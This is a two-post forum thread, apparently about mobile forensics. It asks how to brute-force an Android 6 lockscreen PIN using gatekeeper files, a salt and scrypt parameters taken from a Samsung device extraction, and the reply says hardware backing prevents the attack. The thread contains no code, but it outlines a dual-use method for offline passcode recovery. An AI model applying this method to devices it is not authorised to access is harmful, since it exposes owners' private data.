Decrypt Android 6 g...
 
Notifications
Clear all

Decrypt Android 6 gatekeeper.password.key

2 Posts
2 Users
0 Reactions
7,089 Views
 nic
(@nic)
Active Member
Joined: 4 years ago
Posts: 7
Topic starter  

Hi there,

I have a physical extraction from a Samsung Galaxy A3 2016 and I try to get the plain password.

This report describes how the Android 6.0 (and above) lockscreen passcode storage works:

https://nelenkov.blogspot.com/2015/06/password-storage-in-android-m.html

 

It seems that all the neccessary files are available from this particular extraction:

- "device_policies.xml" tells me that it's an numeric 4-digit passcode

- "0" file (from /data/misc/gatekeeper) with a "scrypt"-encrypted string luckily replaces the hardware HMAC on this device

- "locksettings.db" contains the salt

- "gatekeeper.password.key" is the encrypted passcode

 

As far as I understand, I have to combine all possible passcode combinations (0000 - 9999) without the salt but with the content from the "0" file and compare the result with the hex string in "gatekeeper.password.key" to find/bruteforce the correct passcode:

the 'signature' stored in the password handle file is indeed the scrypt value of the blob's version, the 64-bit secure user ID, and the blob's flags field, concatenated with the plaintext pattern value. The scrypt hash value is calculated using the stored 64-bit salt and the scrypt parameters N=16384, r=8, p=1. Password handles for PINs or passwords are calculated in the same way, using the PIN/password string value as input.

Is that correct? And if yes, how can I implement that?

It seems that the author successfully wrote a python script for that but unfortunately it's not attached.

Would be nice if somebody has an idea.

 

Thanks and have a nice weekend,

Nico

 

This topic was modified 4 years ago by nic

   
Quote
(@arcaine2)
Estimable Member
Joined: 9 years ago
Posts: 239
 

Those are only for non-hwbacked encryption devices. A3 2016 is hw-backed (check the last byte of gatekeeper file if it's 01), which means that you can't bruteforce it.


   
ReplyQuote
Share: